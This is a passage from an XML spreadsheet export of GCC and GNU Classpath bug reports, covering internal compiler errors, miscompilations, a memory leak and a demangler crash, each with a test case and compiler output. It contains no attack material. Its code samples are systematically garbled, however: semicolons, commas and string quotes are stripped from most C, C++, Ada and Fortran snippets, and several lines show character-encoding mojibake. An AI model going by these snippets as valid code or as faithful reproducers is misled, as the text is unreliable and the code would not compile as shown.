It concludes that since -3 &lt;= x &lt;= 5 then 3 &lt;= abs(x) &lt;= 5. This is wrong and
leads to it compiling test() into an unconditional abort.</t>
  </si>
  <si>
    <t>rmorganl</t>
  </si>
  <si>
    <t>GCC-23607</t>
  </si>
  <si>
    <t>gcc.target/i386/pr23575.c fails on x86_64</t>
  </si>
  <si>
    <t>gcc.target/i386/pr23575.c fails with the following message:
/home/pinskia/src/onetest/gcc/gcc/testsuite/gcc.target/i386/pr23575.c:1: error: CPU you selected 
does not support x86-64 instruction set
/home/pinskia/src/onetest/gcc/gcc/testsuite/gcc.target/i386/pr23575.c:1: error: CPU you selected 
does not support x86-64 instruction set</t>
  </si>
  <si>
    <t>GCC-50558</t>
  </si>
  <si>
    <t>illegal program not rejected (record component with no supplied value)</t>
  </si>
  <si>
    <t>Created attachment 25374
File that triggers the bug
The following invalid program (component 'Reserved' does not have default value) compiles with no error (gcc 4.6.1 and 4.7.0 (snapshot) on Debian):
package Pkg is
   type Byte is mod 2**8
   type Reserved_24 is mod 2**24
   type Data_Record is
      record
         Data : Byte
         Reserved : Reserved_24
      end record
   for Data_Record use
      record
         Data at 0 range 0 .. 7
         Reserved at 0 range 8 .. 31
      end record
   for Data_Record'Size use 32
   for Data_Record'Alignment use 4
end Pkg
package Pkg.Reg is
   Data_Register : Data_Record
   pragma Atomic (Data_Register)
end Pkg.Reg
with Pkg.Reg
procedure Test is
begin
   Pkg.Reg.Data_Register := (
      Data =&gt; 255
      others =&gt;  -- expected error: no value supplied for component Reserved
   )
end Test
gnat gives expected error message if definition of Data_Register moved to Pkg. Representation clause for Data_Record and pragma Atomic is not required to trigger this bug but with them strange assembler code generated at leas on x86_64 and cortex-m3:
_ada_test:
        movl    $0 pkg__reg__data_register(%rip)
        movb    $-1 pkg__reg__data_register(%rip)
        ret
_ada_test:
        ldr     r3 .L2
        movs    r2 #0
        str     r2 [r3 #0]
        movs    r2 #255
        strb    r2 [r3 #0]
        bx      lr
Note that atomic variable is accessed twice. I'm not yet sure if this bug can be reproduced by a valid program.</t>
  </si>
  <si>
    <t>eugen</t>
  </si>
  <si>
    <t>GCC-18218</t>
  </si>
  <si>
    <t>Miscompare in sixtrack benchmark caused by loss of precision</t>
  </si>
  <si>
    <t>I could reproduce this problem only on power4 hardware
running SUSE linux.
% uname -a
Linux regsuse01 2.6.5-7-pseries64 #1 SMP Thu Apr 8 15:55:41 UTC 2004 ppc64 ppc64
ppc64 GNU/Linux
% ~/gcc/bin/gfortran --version
GNU Fortran 95 (GCC 4.0.0 20041027 (experimental))
Running SIXTRACK spec benchmark results in a miscompare
even with all optimizations turned off.  The miscompare is caused
by the following place in file eig66.f
      do 40 i=1ndim2
        if(abs(reval(i)**2+aieval(i)**2 -one).gt.c1m10) then
          write(6*) ' EIG6: EIGENVALUES OFF THE UNIT CIRCLE!'
          return
        endif
This code checks that the distance from computed complex
eigenvalues to the unit circle is no more than 10**-10.
With g77 the distance is about 10**-14 and I get similar
results on other platforms with gfortran.  On power4+gfortran
the distance is about 10**-8 which triggers the error
message and causes miscompare.
There is some possibility that this problem is related
to 17927.</t>
  </si>
  <si>
    <t>GCC-8658</t>
  </si>
  <si>
    <t>[sparc-sun-solaris2.8] Cannot install gcc 3.2</t>
  </si>
  <si>
    <t>I get the following error when trying to install gcc 3.2: (as a note
I have tried with both the native as and ld too.)
sudo gmake install 
gmake[2]: Entering directory `/home/urban/gnu_src/objdir/gcc'
for d in libgcc do \
  if [ -d $d ] then true else /bin/sh ../../gcc/gcc/mkinstalldirs $d fi \
done
if [ -f stmp-dirs ] then true else touch stmp-dirs fi
gmake[2]: Leaving directory `/home/urban/gnu_src/objdir/gcc'
echo timestamp &gt; stmp-multilib
/bin/sh: stmp-multilib: cannot create
gmake[1]: *** [stmp-multilib] Error 1
gmake[1]: Leaving directory `/home/urban/gnu_src/objdir/gcc'
gmake: *** [install-gcc] Error 2
Release:
3.2
Environment:
SunOS sunshine 5.8 Generic_108528-12 sun4u sparc SUNWUltra-1
gas --version
GNU assembler 2.13.1
gld --version
GNU ld version 2.13.1
bootstrap compiler - /appl/lang/SUNWspro/bin/cc</t>
  </si>
  <si>
    <t>urban</t>
  </si>
  <si>
    <t>GCC-35932</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] ICE: CHAR with array arg and also a KIND arg</t>
  </si>
  <si>
    <t>The following program generates an ICE.
      program FA0005
! fails on Windows XP
! gcc version 4.4.0 20080312 (experimental) [trunk revision 133139]
      CHARACTER(1) CDA1(10)
      INTEGER IDA(10)
      CDA1 = CHAR (  IDA KIND(A ))     !fails
      CDA1 = CHAR (  IDA  )               !works
      END 
C:\gfortran&gt;gfortran fa0005.f
fa0005.f: In function 'fa0005':
fa0005.f:1: internal compiler error: in gfc_trans_assignment_1 at fortran/trans
-expr.c:4330</t>
  </si>
  <si>
    <t>GCC-65204</t>
  </si>
  <si>
    <t>Aligned address optimization not detected</t>
  </si>
  <si>
    <t>By testing on c++-delayed-folding branch I noticed that gcc doesn't optimize issues as tested in 'c-c++-common/fold-bitand4.c' anymore.
By looking deeper into it it shows that CCP doesn't simplify this because it doesn't track about copy-of.
The testcase demonstrates this:
typedef char char4[4] __attribute__ ((aligned (4)))
char4 c4[4] __attribute__ ((aligned (16)))
int f (int i)
{
  __SIZE_TYPE__ h = (__SIZE_TYPE__)
  /* 0 */
  return 3 
}</t>
  </si>
  <si>
    <t>GCC-31086</t>
  </si>
  <si>
    <t>[4.2 only] ICE in fold_convert at fold-const.c:2331</t>
  </si>
  <si>
    <t>The code below causes an ICE with r122699 (20070308). An older version I happened to have around gfortran-20070220 crashed as well.
$&gt; cat ice.f90
MODULE class_dummy_atom_types
TYPE :: dummy_atom_list
  TYPE(dummy_atom) DIMENSION(:) POINTER :: table
END TYPE
TYPE :: dummy_atom
  TYPE(dummy_atom_private) POINTER :: p
END TYPE
TYPE :: dummy_atom_private
  TYPE(dummy_atom_list) :: neighbours
END TYPE
END MODULE
MODULE class_dummy_atom_model_type
USE class_dummy_atom_types ONLY: dummy_atom_list
TYPE :: dummy_atom_model
  TYPE(dummy_atom_list) :: atoms
END TYPE
END MODULE
MODULE test_class_intensity_private
CONTAINS
  SUBROUTINE change_phase(atom)
    USE class_dummy_atom_types
    TYPE(dummy_atom) INTENT(inout) :: atom
  END SUBROUTINE
  SUBROUTINE simulate_cube()
    USE class_dummy_atom_types
    USE class_dummy_atom_model_type
    TYPE(dummy_atom)       :: atom
    TYPE(dummy_atom_model) :: dam
    atom = dam%atoms%table(1)
  END SUBROUTINE
END MODULE
$&gt; gfortran-svn -g -Wall ice.f90
ice.f90: In function 'simulate_cube':
ice.f90:25: internal compiler error: in fold_convert at fold-const.c:2331
Please submit a full bug report
$&gt; gfortran-svn -v
gcc version 4.3.0 20070308 (experimental)</t>
  </si>
  <si>
    <t>GCC-34691</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] Default argument checking not performed after overload resolution with C linkage</t>
  </si>
  <si>
    <t>The following code is ill-formed according to the standard but accepted by GCC:
namespace A {
        extern C void f(int = 5)
}
namespace B {
        extern C void f(int = 4)
}
using A::f
using B::f
int main() {
    f(3)    //OK
    f()     //ERROR
}
When a default argument is used as in the second call it needs to be looked up to make sure it isn't declared twice. If it is then it's an error. GCC will also accept the code whether the default arguments to f() are given the same or different values.</t>
  </si>
  <si>
    <t>coppro</t>
  </si>
  <si>
    <t>CLASSPATH-30346</t>
  </si>
  <si>
    <t>Native2ASCII -reversed fails if \u00e9 is not followed by any char</t>
  </si>
  <si>
    <t>Using gnu.classpath.tools.native2ascii.Native2ASCII with option -reversed
to convert \u00e9 into Ã© (e with acute).
This is just an example letter the problem occurs with an char.
1) Example when conversion fails
INPUT
:~&gt; echo \u00e9|gij -classpath /usr/share/java/glibj.jar:/usr/share/classpath/tools.zip gnu.classpath.tools.native2ascii.Native2ASCII --reversed
OUTPUT
\u00e9
No conversion is done output=input. No error message.
Expected result is Ã© (e with acute).
2) Example when conversion works
INPUT (Note the trailing space in echo \u00e9 )
:~&gt; echo \u00e9 |gij -classpath /usr/share/java/glibj.jar:/usr/share/classpath/tools.zip gnu.classpath.tools.native2ascii.Native2ASCII --reversed
OUTPUT
Ã©
The output is the expected result. This is always the case when the hex-value is not at the very end of the line.
3) Reason / Fix
The reason seems to be in line 146 of
gnu.classpath.tools.native2ascii.Native2ASCII.java:
if (reversed &amp;&amp; i + 6 &lt; s.length() &amp;&amp; etc.
should probably be:
if (reversed &amp;&amp; i + 6 &lt;= s.length() &amp;&amp; etc.</t>
  </si>
  <si>
    <t>qwert2003</t>
  </si>
  <si>
    <t>GCC-84032</t>
  </si>
  <si>
    <t>ICE in optimize_sc at modulo-sched.c:1064</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20180121 snapshot (r256935) ICEs when compiling the following snippet w/ -mcpu=power6 (=power6x) -O1 -fmodulo-sched:
void
yr (int cm)
{
  int ka = cm
  for ()
    {
      short int m0
      for (m0 = 0 m0 &lt; 6 ++m0)
        {
          ka 
          cm *= 2
        }
      ka = (ka == 0) ? cm : 0
    }
}
% powerpc-e300c3-linux-gnu-gcc-8.0.0-alpha20180121 -mcpu=power6 -O1 -fmodulo-sched -c xjqb9y7g.c
during RTL pass: sms
xjqb9y7g.c: In function 'yr':
xjqb9y7g.c:18:1: internal compiler error: in optimize_sc at modulo-sched.c:1064
 }
 ^
0x149a578 optimize_sc
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20180121/work/gcc-8-20180121/gcc/modulo-sched.c:1064
0x149a578 sms_schedule
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20180121/work/gcc-8-20180121/gcc/modulo-sched.c:1629
0x149a642 execute
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20180121/work/gcc-8-20180121/gcc/modulo-sched.c:3345</t>
  </si>
  <si>
    <t>zhroma</t>
  </si>
  <si>
    <t>GCC-80543</t>
  </si>
  <si>
    <t>[5 Regression] ICE in tsubst_copy at cp/pt.c:13039</t>
  </si>
  <si>
    <t>Created attachment 41278
Example code.
It seems that the compiler fails to capture a const local variable. Removing the const from local makes the compilation work.
This seems to be a regression. Same code compiles on g++-4.9 g++-6.3.0 and g++-7.0.1. (Ubuntu repository versions not vanilla.)
Output:
```
g++-5 -Wall -Wextra -O2 -std=c++14 -o lambda lambda.cpp 
lambda.cpp: In function â€˜auto find(const std::vector&amp; int)â€™:
lambda.cpp:7:16: warning: variable â€˜localâ€™ set but not used [-Wunused-but-set-variable]
     const auto local = val
                ^
lambda.cpp: In instantiation of â€˜find(const std::vector&amp; int):: [with auto:1 = int]â€™:
/usr/include/c++/5/bits/predefined_ops.h:234:30:   required from â€˜bool __gnu_cxx::__ops::_Iter_pred::operator()(_Iterator) [with _Iterator = __gnu_cxx::__normal_iterator &gt; _Predicate = find(const std::vector&amp; int)::]â€™
/usr/include/c++/5/bits/stl_algo.h:120:14:   required from â€˜_RandomAccessIterator std::__find_if(_RandomAccessIterator _RandomAccessIterator _Predicate std::random_access_iterator_tag) [with _RandomAccessIterator = __gnu_cxx::__normal_iterator &gt; _Predicate = __gnu_cxx::__ops::_Iter_pred&amp; int):: &gt;]â€™
/usr/include/c++/5/bits/stl_algo.h:161:23:   required from â€˜_Iterator std::__find_if(_Iterator _Iterator _Predicate) [with _Iterator = __gnu_cxx::__normal_iterator &gt; _Predicate = __gnu_cxx::__ops::_Iter_pred&amp; int):: &gt;]â€™
/usr/include/c++/5/bits/stl_algo.h:3815:28:   required from â€˜_IIter std::find_if(_IIter _IIter _Predicate) [with _IIter = __gnu_cxx::__normal_iterator &gt; _Predicate = find(const std::vector&amp; int)::]â€™
lambda.cpp:13:26:   required from here
lambda.cpp:12:38: internal compiler error: in tsubst_copy at cp/pt.c:13039
                             return i == local
```</t>
  </si>
  <si>
    <t>markku.linnoskivi</t>
  </si>
  <si>
    <t>GCC-50545</t>
  </si>
  <si>
    <t>[C++0x][DR 1172] SFINAE does not handle an explicit type conversion (functional notation) with a braced-init-list well if target type is not dependent</t>
  </si>
  <si>
    <t>// tested on gcc-4.7-20110924 (experimental)
template
T
// #1
template
auto f( int )
  -&gt; decltype( int{ declval() } )
// #2
template
void f( ... )
#define STATIC_ASSERT( ... ) static_assert( __VA_ARGS__ #__VA_ARGS__ )
template
struct is_same {
  static constexpr bool value = false
}
template
struct is_same {
  static constexpr bool value = true
}
STATIC_ASSERT( is_same(0) )  int &gt;::value )  // OK f(0) calls #1.
STATIC_ASSERT( is_same(0) ) void &gt;::value ) // static assertion fails f(0) should call #2 because int{ (int*)0 } is ill-formed but calls #1.</t>
  </si>
  <si>
    <t>GCC-6341</t>
  </si>
  <si>
    <t>G++ 3.0.4: two instances are stored in the same memory address?</t>
  </si>
  <si>
    <t>See the preprocessed (test.ii) code in How-To-Repeat section.
When compiled without -O or with g++ 2.95.2 the output looks like this:
X2: 1 0xbffffbf4
X2: 2 0xbffffbf8
~X: 1 0xbffffbf4
X1: 3 0xbffffbf0
~X: 3 0xbffffbf0
~X: 2 0xbffffbf8
Looks fine. But when compiled with g++ 3.0.4 and -O (or -O2 or -O3) the output looks like this:
X2: 1 0xbffffbd4
X2: 2 0xbffffbe4
X1: 3 0xbffffbd4
~X: 3 0xbffffbd4
~X: 2 0xbffffbe4
~X: 3 0xbffffbd4
It seems that the 1st and the 3rd instance of X use the same  memory area at the same time. And the value of x in the first instance gets overwritten by the value of x in the 3rd  instance.
The command line used was:
    g++ -O test.cc
There was no compiler output (warnings or errors).
(PS. The help page of gnatsweb said about the Submitter-Id field that If this is unknown leave the default setting.. However the default setting unknown didn't work. That's why I selected net without knowing what it means...)
Release:
gcc version 3.0.4
Environment:
Tried two platforms with the same results:
1) Debian Linux (kernel 2.4.18) on i386 gcc-3.0.4 from Debian package.
2) SunOS 5.5.1 on Sparc gcc-3.0.4 hand-compiled with ../gcc-3.0.4/configure --prefix=/usr/local/gcc-3.0.4.
Output generated by g++ -v -save-temps -O test.cc on platform 1:
Reading specs from /usr/lib/gcc-lib/i386-linux/3.0.4/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.0.4
 /usr/lib/gcc-lib/i386-linux/3.0.4/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=4 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ test.cc test.ii
GNU CPP version 3.0.4 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-v3
 /usr/include/g++-v3/i386-linux
 /usr/include/g++-v3/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/3.0.4/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-linux/3.0.4/cc1plus -fpreprocessed test.ii -quiet -dumpbase test.cc -O -version -o test.s
GNU CPP version 3.0.4 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.4 (i386-linux)
        compiled by GNU C version 3.0.4.
 as -V -Qy -o test.o test.s
GNU assembler version 2.12.90.0.1 (i386-linux) using BFD version 2.12.90.0.1 20020307 Debian/GNU Linux
 /usr/lib/gcc-lib/i386-linux/3.0.4/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/gcc-lib/i386-linux/3.0.4/../../../crt1.o /usr/lib/gcc-lib/i386-linux/3.0.4/../../../crti.o /usr/lib/gcc-lib/i386-linux/3.0.4/crtbegin.o -L/usr/lib/gcc-lib/i386-linux/3.0.4 -L/usr/lib/gcc-lib/i386-linux/3.0.4/../../.. test.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/lib/gcc-lib/i386-linux/3.0.4/crtend.o /usr/lib/gcc-lib/i386-linux/3.0.4/../../../crtn.o
How-To-Repeat:
# 1 test.cc
extern C int printf(const char *format ...)
static int y = 0
class X {
public:
    X(const X printf(X1: %d %p\n x this) }
    X() { x = ++y printf(X2: %d %p\n x this) }
    ~X() { printf(~X: %d %p\n x this) }
private:
    int x
}
inline X a(X r) { return X() }
inline void b(X r) {}
inline void c(X r) { b(r) }
int main(void) { c(a(X())) }</t>
  </si>
  <si>
    <t>GCC-63628</t>
  </si>
  <si>
    <t>[c++1y] cannot use decltype on captured arg-pack</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #61814 +++
The code below has a lambda that captures the outer params t for forwarding matter decltype on t has to be used.
```
    auto const pack = [](auto&amp;&amp;... t)
    {
        return [&amp;](auto&amp;&amp; f)-&gt;decltype(auto)
        {
            return f(static_cast(t)...)
        }
    }
    int main(int argc char** argv) {
        pack(1)([](int){})
        return 0
    }
```
It works with clang 3.5 but g++ 4.9.0 complains:
error: 't' was not declared in this scope
The same also applies to `sizeof` or that kind of compile-time thing.</t>
  </si>
  <si>
    <t>GCC-72790</t>
  </si>
  <si>
    <t>MOVE_ALLOC() of character looses content data</t>
  </si>
  <si>
    <t>Created attachment 39052
Code to reproduced the bug
The following code snippet reproduces the problem:
    program move_alloc_test
        character(:) allocatable :: srcString destString
        integer allocatable :: srcArray(:) destArray(:)
        srcString = foo
        call move_alloc(srcString destString)
        write(0*) destString = '//destString//' &amp;
                   &amp;allocated(srcString) =  allocated(srcString)  &amp;
                   &amp;allocated(destString) =  allocated(destString)
        srcArray = [1 2 3]
        call move_alloc(srcArray destArray)
        write(0*) destArray = ( destArray ) &amp;
                   &amp;allocated(srcArray) =  allocated(srcArray)  &amp;
                   &amp;allocated(destArray) =  allocated(destArray)
    end program
The output of this program when compiled with either gfortran 4.9.2 or 5.1.0 shows an empty `destString` after the `move_alloc()` call:
     destString = '' allocated(srcString) =  F  allocated(destString) =  T
     destArray = (           1           2           3 ) allocated(srcArray) =  F  allocated(destArray) =  T
The output that I would have expected is this:
     destString = 'foo' allocated(srcString) =  F  allocated(destString) =  T
     destArray = (           1           2           3 ) allocated(srcArray) =  F  allocated(destArray) =  T
Note that this loss of data only happens for `character` allocatables not for array allocatables.</t>
  </si>
  <si>
    <t>nathanael.huebbe</t>
  </si>
  <si>
    <t>GCC-71195</t>
  </si>
  <si>
    <t>[5 Regression] ICE in classify_argument on invalid code</t>
  </si>
  <si>
    <t>Created attachment 38523
preprocessed source
The attached (invalid) testcase ICEs on the GCC 5 branch like
&gt; g++-5 -S bug.cc -std=c++1y -B /abuild/rguenther/gcc5-g/gcc
In file included from /usr/include/boost/functional/hash/hash.hpp:20:0
                 from /usr/include/boost/functional/hash.hpp:6
                 from /home/user/src/evernus/ExternalOrderImporter.h:20
                 from /home/user/src/evernus/EveCentralExternalOrderImporter.h:19
                 from /home/user/src/evernus/EveCentralExternalOrderImporter.cpp:17:
/usr/lib/gcc/x86_64-pc-linux-gnu/5.3.0/include/g++-v5/functional: In constructor â€˜std::function::function(_Functor) [with _Functor = Evernus::EveCentralExternalOrderImporter::fetchExternalOrders(const TypeLocationPairs  = void _Res = void _ArgTypes = {std::vector &gt;&amp;&amp; const QString&amp;}]â€™:
/usr/lib/gcc/x86_64-pc-linux-gnu/5.3.0/include/g++-v5/functional:2250:7: internal compiler error: Segmentation fault
0xfa75c6 crash_signal
        /space/rguenther/src/svn/gcc-5-branch/gcc/toplev.c:383
0x6e0a9e contains_struct_check(tree_node const* tree_node_structure_enum char const* int char const*)
        /space/rguenther/src/svn/gcc-5-branch/gcc/tree.h:3220
0x7d0d93 wi::extended_tree::extended_tree(tree_node const*)
        /space/rguenther/src/svn/gcc-5-branch/gcc/tree.h:4939
0x7d07bd generic_wide_int &gt;::generic_wide_int(tree_node const* const&amp;)
        /space/rguenther/src/svn/gcc-5-branch/gcc/wide-int.h:718
0x7d0791 wi::to_offset(tree_node const*)
        /space/rguenther/src/svn/gcc-5-branch/gcc/tree.h:4932
0xae7e74 int_bit_position(tree_node const*)
        /space/rguenther/src/svn/gcc-5-branch/gcc/tree.h:5080
0x131815b classify_argument
        /space/rguenther/src/svn/gcc-5-branch/gcc/config/i386/i386.c:6866
0x1318eb3 examine_argument
        /space/rguenther/src/svn/gcc-5-branch/gcc/config/i386/i386.c:7180
0x1319b17 function_arg_advance_64
        /space/rguenther/src/svn/gcc-5-branch/gcc/config/i386/i386.c:7582
0x1319ea3 ix86_function_arg_advance
        /space/rguenther/src/svn/gcc-5-branch/gcc/config/i386/i386.c:7671
0xc22627 gimplify_parameters()
        /space/rguenther/src/svn/gcc-5-branch/gcc/function.c:3889
0xd0eb67 gimplify_body(tree_node* bool)
        /space/rguenther/src/svn/gcc-5-branch/gcc/gimplify.c:9256
0xd0f40f gimplify_function_tree(tree_node*)
        /space/rguenther/src/svn/gcc-5-branch/gcc/gimplify.c:9414
0xabb8ce cgraph_node::analyze()
        /space/rguenther/src/svn/gcc-5-branch/gcc/cgraphunit.c:634
0xabcba2 analyze_functions
        /space/rguenther/src/svn/gcc-5-branch/gcc/cgraphunit.c:1024
0xac0ff5 symbol_table::finalize_compilation_unit()
        /space/rguenther/src/svn/gcc-5-branch/gcc/cgraphunit.c:2453
0x8176ec cp_write_global_declarations()
        /space/rguenther/src/svn/gcc-5-branch/gcc/cp/decl2.c:4849
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
while GCC 4.9 and GCC 6 report an error:
&gt; g++-6 -S bug.cc -std=c++1y
/home/user/src/evernus/EveCentralExternalOrderImporter.cpp: In instantiation of â€˜Evernus::EveCentralExternalOrderImporter::fetchExternalOrders(const TypeLocationPairs auto:2 = QString]â€™:
/home/user/src/evernus/EveCentralExternalOrderImporter.cpp:38:112:   required by substitution of â€˜template Evernus::EveCentralExternalOrderImporter::fetchExternalOrders(const TypeLocationPairs auto:2 = QString]â€™
/usr/lib/gcc/x86_64-pc-linux-gnu/5.3.0/include/g++-v5/functional:1981:45:   required by substitution of â€˜template std::function::function(_Functor) [with _Functor = Evernus::EveCentralExternalOrderImporter::fetchExternalOrders(const TypeLocationPairs  = ]â€™
/home/user/src/evernus/EveCentralExternalOrderImporter.cpp:40:10:   required from here
/home/user/src/evernus/EveCentralExternalOrderImporter.cpp:39:13: error: cannot call member function â€˜void Evernus::EveCentralExternalOrderImporter::processResult(std::vector&amp;&amp; const QString&amp;) constâ€™ without object</t>
  </si>
  <si>
    <t>GCC-5791</t>
  </si>
  <si>
    <t>'\a' is interpreted as 'a'</t>
  </si>
  <si>
    <t>'\a' is interpreted as 'a'
Release:
3.2 20020227 (experimental)
Environment:
System: Linux never 2.4.17 #3 SMP Tue Dec 29 21:27:44 CET 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /mirror/d/gcc/configure --disable-nls --prefix=/p/p/gcc-2002-02-28.01h10
How-To-Repeat:
$ cat k.c
f () { switch (1) { case '\a': case 'a': return } }
$ gcc k.c
k.c: In function `f':
k.c:1: duplicate case value
k.c:1: previously used here
[Exit 1]</t>
  </si>
  <si>
    <t>GCC-67884</t>
  </si>
  <si>
    <t>Missing error message on required allocatable attribute</t>
  </si>
  <si>
    <t>This definition of f is incomplete :
$ cat z2a.f90
program p
   integer i
   print * [(f(i) i=13)]
contains
   function f(n)
      integer :: n
      character(:) :: f
      character(3) :: c = 'abc'
      f = c(n:n)
   end
end
$ gfortran -g -O0 -Wall -fcheck=all z2a.f90
$ a.out
With additional/different options other effects may occur.
Only sometimes. Needs running a.out many times.
For example :
$ gfortran -g -O0 -fcheck=all -fstack-protector z2a.f90
$ a.out
Operating system error: Cannot allocate memory
Memory allocation failed</t>
  </si>
  <si>
    <t>GCC-51160</t>
  </si>
  <si>
    <t>[OOP] Memory leak with abstract type</t>
  </si>
  <si>
    <t>Hi
   the attached code which I think is correct leaks memory.
According to valgrind this happens in subroutine subr at line
  class(et) intent(inout) :: y
Here is the output:
==29006== HEAP SUMMARY:
==29006==     in use at exit: 40000 bytes in 100 blocks
==29006==   total heap usage: 223 allocs 123 frees 57583 bytes allocated
==29006== 
==29006== 40000 bytes in 100 blocks are definitely lost in loss record 1 of 1
==29006==    at 0x4C26F5D: malloc (vg_replace_malloc.c:263)
==29006==    by 0x400A20: __mod2_MOD___copy_mod2_Et (test.f90:38)
==29006==    by 0x4008E6: __mod1_MOD_sub (test.f90:24)
==29006==    by 0x400D0C: MAIN__ (test.f90:53)
==29006==    by 0x400E1E: main (test.f90:46)
==29006== 
==29006== LEAK SUMMARY:
==29006==    definitely lost: 40000 bytes in 100 blocks
==29006==    indirectly lost: 0 bytes in 0 blocks
==29006==      possibly lost: 0 bytes in 0 blocks
==29006==    still reachable: 0 bytes in 0 blocks
==29006==         suppressed: 0 bytes in 0 blocks
==29006== 
The problem becomes more and more severe increasing n.
gfortran --version
GNU Fortran (GCC) 4.7.0 20111116 (experimental)
and I'm compiling with
gfortran -g test.f90 -o prg
module mod1
implicit none
 type abstract :: at
  contains
  procedure(i_copy) deferred pass(y) :: copy
 end type at
 abstract interface
  subroutine i_copy(yx)
   import :: at
   implicit none
   class(at) intent(in)    :: x
   class(at) intent(inout) :: y
  end subroutine i_copy
 end interface
contains
 subroutine sub(qp)
  class(at) intent(in) :: p
  class(at) intent(inout) :: q
  class(at) allocatable :: r
   allocate(rsource=p)
   call r%copy(p)
   call q%copy(r)
   deallocate(r)
 end subroutine sub
end module mod1
module mod2
 use mod1
implicit none
 type extends(at) :: et
  real allocatable :: u(:)
 contains
  procedure pass(y) :: copy =&gt; subr
 end type et
contains
 subroutine subr(yx)
  class(at) intent(in)    :: x
  class(et) intent(inout) :: y
   select type(x) type is(et)
    y%u = x%u
   end select
 end subroutine subr
end module mod2
program prog
 use mod1
 use mod2
 integer parameter :: n = 100
 type(et) :: a b
 allocate(a%u(n)) a%u = 1.5
 allocate(b%u(n))
 do i=1n
   call sub(ba)
 enddo
 deallocate(a%ub%u)
end program prog</t>
  </si>
  <si>
    <t>GCC-419</t>
  </si>
  <si>
    <t>gcc-2.95.2: ICE on incorrect C++ code</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Fri 14 Jul 2000 15:22:20 +0200
 Original-Message-Id: 
 I got ICE on following incorrect C++ code (	template arguments were
 swapped if I fix this problem ICE disappears). No preprocessed source as
 example uses STL only. I verified that I'm getting ICE also with gcc-2.96
 20000713
 target: i586-pc-linux-gnu
 Andris
Release:
2.95.2
How-To-Repeat:
#include 
#include 
#include 
struct foo
  {
       double   b
       double   c
       double   F (void) const
  }
int     bar (vector &amp; data vector &amp; res)
  {
        transform (data.begin() data.end() back_inserter(res)
                  mem_fun_ref (
        return 0
  }</t>
  </si>
  <si>
    <t>GCC-8656</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] Unable to assign function with __attribute__ and pointer return type to an appropriate variable</t>
  </si>
  <si>
    <t>Consider the following source code saved in file bar.c:
--------------------------- 8&lt; ---------------------------
extern int * (__attribute__((stdcall)) *fooPtr)( void)
int * __attribute__((stdcall)) myFn01( void) { return 0 }
void snafu( void)
{
    fooPtr = myFn01
}
--------------------------- 8&lt; ---------------------------
Running g++ -c bar.c gives:
--------------------------- 8&lt; ---------------------------
bar.c: In function `void snafu()':
bar.c:7: invalid conversion from `int*(*)()' to `int*(*)()'
--------------------------- 8&lt; ---------------------------
However running gcc -c bar.c creates no such problems.
With reference to the source code given above here're
a few more observations:
1. This problem is not shown by the 2.95.3 g++.
2. If the definition of myFn01 above is changed to
   a declaration or if a declaration for the same is
   added before it the problem disappears.
3. The problem appears only if the return type is
   of the kind xyz * - if there's a typedef int *intptr
   and we use intptr instead of int * for myFn01 the
   problem disappears.
4. The problem can also be circumvented by putting the
   attribute and the function name together in parentheses
   like int * (__attribute__((stdcall)) myFn01)( void).
5. The problem does not come if all the stdcall instances
   are replaced by cdecl but it reappears if they are
   replaced by fastcall.
6. Both Borland C/C++ 5.5 and MSVC++ 6.2 compile this code
   perfectly (after using the MS equivalent __stdcall).
Lastly this looks very similar to PR 6626 but IMHO is
different - the syntax and semantics are perfectly valid
in this case as far as I can see.
Release:
GCC 3.2
Environment:
MinGW Cygwin and Linux(x86) (and possibly other x86-32
targets)
How-To-Repeat:
Just save the sample code given above as file bar.c (or
whatever) and run g++ -c on it.</t>
  </si>
  <si>
    <t>GCC-72822</t>
  </si>
  <si>
    <t>libiberty/ demangler crash</t>
  </si>
  <si>
    <t>https://bugzilla.redhat.com/show_bug.cgi?id=1364588
r239179 2016-08-05
_ZNK6clover6detail11basic_rangeINS_13adaptor_rangeIZNS_6kernel6launchERNS_13command_queueERKSt6vectorImSaImEESA_SA_EUlmE_JRS8_EEENS0_16iterator_adaptorISB_JN9__gnu_cxx17__normal_iteratorIPmS8_EEEEESJ_EcvT_IS6_IPjSaISN_EEvEEv
